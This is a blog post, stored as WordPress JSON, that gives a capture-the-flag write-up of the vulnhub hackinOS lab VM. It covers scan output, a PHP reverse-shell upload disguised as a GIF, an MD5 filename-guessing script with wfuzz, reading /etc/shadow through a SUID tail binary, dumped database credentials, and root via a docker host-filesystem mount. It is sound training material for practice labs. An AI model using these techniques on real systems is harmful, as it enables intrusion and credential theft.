{"id":108,"date":"2019-05-04T04:30:20","date_gmt":"2019-05-04T04:30:20","guid":{"rendered":"http:\/\/www.unordnung.net\/?p=108"},"modified":"2019-05-04T04:30:20","modified_gmt":"2019-05-04T04:30:20","slug":"vulnhub-hackingos-writeup","status":"publish","type":"post","link":"https:\/\/unordnung.net\/misc\/2019\/05\/vulnhub-hackingos-writeup\/","title":{"rendered":"vulnhub hackingOS writeup"},"content":{"rendered":"

https:\/\/www.vulnhub.com\/entry\/hackinos-1,295\/<\/a>
\nrunning sparta gave me port 22 and 8000, on 8000 i found a defunct wordpress. which pointed to localhost, that could be fixed with locally assigning localhost to the vm’s network ip.
\ni also found that Handsome_Container was a valid wordpress username. i started bruteforcing it with burp suite.
\nnikto revealed some interesting infos:
\n– Nikto v2.1.6
\n—————————————————————————
\n+ Target IP: 192.168.56.101
\n+ Target Hostname: 192.168.56.101
\n+ Target Port: 8000
\n+ Start Time: 2019-05-01 14:55:20 (GMT2)
\n—————————————————————————
\n+ Server: Apache\/2.4.25 (Debian)
\n+ Retrieved x-powered-by header: PHP\/7.2.15
\n+ The anti-clickjacking X-Frame-Options header is not present.
\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
\n+ Root page \/ redirects to: http:\/\/192.168.56.101:8000\/
\n+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
\n+ Entry ‘\/upload.php’ in robots.txt returned a non-forbidden or redirect HTTP code (200)
\n+ “robots.txt” contains 2 entries which should be manually viewed.
\n+ Apache\/2.4.25 appears to be outdated (current is at least Apache\/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
\n+ Uncommon header ‘link’ found, with contents: ; rel=”https:\/\/api.w.org\/”
\n+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
\n+ OSVDB-3233: \/icons\/README: Apache default file found.
\n+ \/wp-content\/plugins\/hello.php: PHP error reveals file system path.
\n+ OSVDB-62684: \/wp-content\/plugins\/hello.php: The WordPress hello.php plugin reveals a file system path
\n+ \/wp-links-opml.php: This WordPress script reveals the installed version.
\n+ OSVDB-3092: \/license.txt: License file found may identify site software.
\n+ Cookie wordpress_test_cookie created without the httponly flag
\n+ \/wp-login.php: WordPress login found
\n+ 7919 requests: 0 error(s) and 16 item(s) reported on remote host
\n+ End Time: 2019-05-01 14:56:56 (GMT2) (96 seconds)
\n—————————————————————————
\n+ 1 host(s) tested
\nthe \/upload.php is interesting, its an image upload function. i started uploading with php reverse shells infected png images. That didnt work out.
\nWarning: getimagesize(): PNG file corrupted by ASCII conversion in \/var\/www\/html\/upload.php on line 25
\n\ud83d\ude42
\nAt some point i found the hint hidden in the html code <– https:\/\/github.com\/fatihhcelik\/Vulnerable-Machine—Hint –>
\nThat revealed the upload.php’s code:
\n
\nThat makes it a lot easier. We can see that the file ist renamed to the md5 of the filename and a random number from 1-100.
\nThe script checks the mime type of the uploaded file but no extension, allowed are gif and png mime types.
\nSo i created a random png image with gimp and opened it with hex editor, put a a php reverse shell in it. upload wont work -.- after learning and experimenting i found a gif working like that:
\ncat cmd.php
\nGIF89a;
\n#
\n
\nnow we get to launch the shell and for that we need to find the uploaded file, so i wrote a script to create the 100 possible hashes of cmd.phpXXX<\/p>\n

#!\/usr\/bin\/python3\nimport hashlib\ntextToEncode = input()\nbisHundert = 1\ntoEncode = textToEncode+str(bisHundert)\nwhile bisHundert<=100:\nprint(hashlib.md5(toEncode.encode('utf-8')).hexdigest())\nbisHundert += 1\ntoEncode = textToEncode+str(bisHundert)<\/pre>\n
$ python3 md5hackinOS_ctf.py > cmdphphashes.txt
\ncmd.php
\nthomsane@anansi:~\/python$ cat cmdphphashes.txt
\n04292b8d46833c395942086e6ed2cd2c
\nd44843c7108897d25a243ffc3cd1edb7
\n(…)
\n180134430544955d54b576c726c76217
\nnow we can supply wfuzz with the payloads stored in the textfile.
\n$ sudo wfuzz -w python\/cmdphphashes.txt –hc 404 http:\/\/192.168.56.101:8000\/uploads\/FUZZ.php
\nWarning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz’s documentation for more information.
\n********************************************************
\n* Wfuzz 2.3.4 – The Web Fuzzer *
\n********************************************************
\nTarget: http:\/\/192.168.56.101:8000\/uploads\/FUZZ.php
\nTotal requests: 100
\n==================================================================
\nID Response Lines Word Chars Payload
\n==================================================================
\n000024: C=200 3 L 16 W 165 Ch “39b07a3be178f1249b64f60105360c4b”
\nTotal time: 0.245449
\nProcessed Requests: 100
\nFiltered Requests: 99
\nRequests\/sec.: 407.4165
\nand it found our “picture” at
\nhttp:\/\/192.168.56.101:8000\/uploads\/39b07a3be178f1249b64f60105360c4b.php
\nand my listener received the shell \ud83d\ude42 which i upgraded to a real tty with python -c ‘import pty; pty.spawn(“\/bin\/bash”)’ and started looking for priv esc possibilities.
\ni found \/usr\/bin\/tail to have SUID bit set and tried to:
\n$ tail -n 100 \/root\/flag
\nLife consists of details..
\nwell, thats not a flag right? but no permission error either since cat: \/root\/flag: Permission denied
\ntail -c1G \/etc\/shadow
\nroot:$6$qoj6\/JJi$FQe\/BZlfZV9VX8m0i25Suih5vi1S\/\/OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova\/:17951:0:99999:7:::
\ndaemon:*:17931:0:99999:7:::
\nbin:*:17931:0:99999:7:::
\nsys:*:17931:0:99999:7:::
\nsync:*:17931:0:99999:7:::
\ngames:*:17931:0:99999:7:::
\nman:*:17931:0:99999:7:::
\nlp:*:17931:0:99999:7:::
\nmail:*:17931:0:99999:7:::
\nnews:*:17931:0:99999:7:::
\nuucp:*:17931:0:99999:7:::
\nproxy:*:17931:0:99999:7:::
\nwww-data:*:17931:0:99999:7:::
\nbackup:*:17931:0:99999:7:::
\nlist:*:17931:0:99999:7:::
\nirc:*:17931:0:99999:7:::
\ngnats:*:17931:0:99999:7:::
\nnobody:*:17931:0:99999:7:::
\n_apt:*:17931:0:99999:7:::
\nenumerating further i found $ cat \/etc\/init.d\/delete.sh
\ncat \/etc\/init.d\/delete.sh
\n#!\/bin\/bash
\nwhile [ 1 ]
\ndo
\nrm -rf \/var\/www\/html\/uploads\/*.php
\nsleep 300
\ndone
\nokay…that was the fuck keeping burp suite intruder from finding the file because of the speed throtteling in the free edition. -.-
\ncat wp-config.php
\n dumpall.sql
\nLOCK TABLES `host_ssh_cred` WRITE;
\n\/*!40000 ALTER TABLE `host_ssh_cred` DISABLE KEYS *\/;
\nINSERT INTO `host_ssh_cred` VALUES (‘hummingbirdscyber’,’e10adc3949ba59abbe56e057f20f883e’);
\n\/*!40000 ALTER TABLE `host_ssh_cred` ENABLE KEYS *\/;
\nUNLOCK TABLES;
\nINSERT INTO `wp_users` VALUES (1,’Handsome_Container’,’$P$BXJ8ZmtYd5lHZOLPgTccLUhaQLxm0L0′,’handsome_container’,’pupetofosu@ask-mail.com’,”,’2019-02-23 15:49:54′,”,0,’Handsome_Container’);
\nhummingbirdscyber
\ne10adc3949ba59abbe56e057f20f883e md5 of 123456
\nhummingbirdscyber@vulnvm:~$
\nwell, well, well…i was on a container before! i noticed when i looked in \/var\/www\/html and only found an index.html. i was thinking so when i was looking on the mounts on the container…
\n[+] Current User
\nhummingbirdscyber
\n[+] Current User ID
\nuid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)
\nok, we are in the docker group…so basically root already.
\nlets look what containers run<\/p>\n
hummingbirdscyber@vulnvm:~$ docker ps\nCONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES\n252fa8cb1646 ubuntu \"\/bin\/bash\" 2 months ago Up 2 days brave_edison\n1afdd1f6b82c wordpress:latest \"docker-entrypoint.s\u2026\" 2 months ago Up 2 days 0.0.0.0:8000->80\/tcp experimental_wordpress_1\n81a93420fd22 mysql:5.7 \"docker-entrypoint.s\u2026\" 2 months ago Up 2 days 3306\/tcp, 33060\/tcp experimental_db_1<\/pre>\n
since i run the vulnerable vm without internet access for security reasons, i used the ubuntu image which already exists to elevate my privileges
\nhummingbirdscyber@vulnvm:~$ docker run -v \/:\/hostOS -i -t ubuntu
\nnow we run a a new container and the \/ filesystem of the main host is mounted to \/hostOS
\nroot@c50ed36b8d25:\/hostOS\/root# cat flag<\/p>\n
Congratulations!\n                              -ys-\n                                \/mms.\n                                  +NMd+`\n                               `\/so\/hMMNy-\n                                 `+mMMMMMMd\/           .\/oso\/-\n                                  `\/yNMMMMMMMMNo`   .`   +-\n                                  .oyhMMMMMMMMMMN\/.     o.\n                                    `:+osysyhddhs`    `o`\n                                     .:oyyhshMMMh.   .:\n                                  `-\/\/:. `:sshdh: `\n                                             -so:.\n                                            .yy.\n                                          :odh\n                                        +o--d`\n                                      \/+. .d`\n                                    -\/`  `y`\n                                  `:`   `\/\n                                 `.     `<\/pre>\n
that was fun \ud83d\ude42 <3<\/p>\n","protected":false},"excerpt":{"rendered":"
https:\/\/www.vulnhub.com\/entry\/hackinos-1,295\/ running sparta gave me port 22 and 8000, on 8000 i found a defunct wordpress. which pointed to localhost, that could be fixed with locally assigning localhost to the vm’s network ip. i also found that Handsome_Container was a valid wordpress username. i started bruteforcing it with burp suite. nikto revealed some interesting infos: … Read morevulnhub hackingOS writeup<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,4],"tags":[15],"class_list":["post-108","post","type-post","status-publish","format-standard","hentry","category-ctf-writeup","category-to_remember","tag-ctf"],"_links":{"self":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/108","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/comments?post=108"}],"version-history":[{"count":0,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/108\/revisions"}],"wp:attachment":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/media?parent=108"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/categories?post=108"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/tags?post=108"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}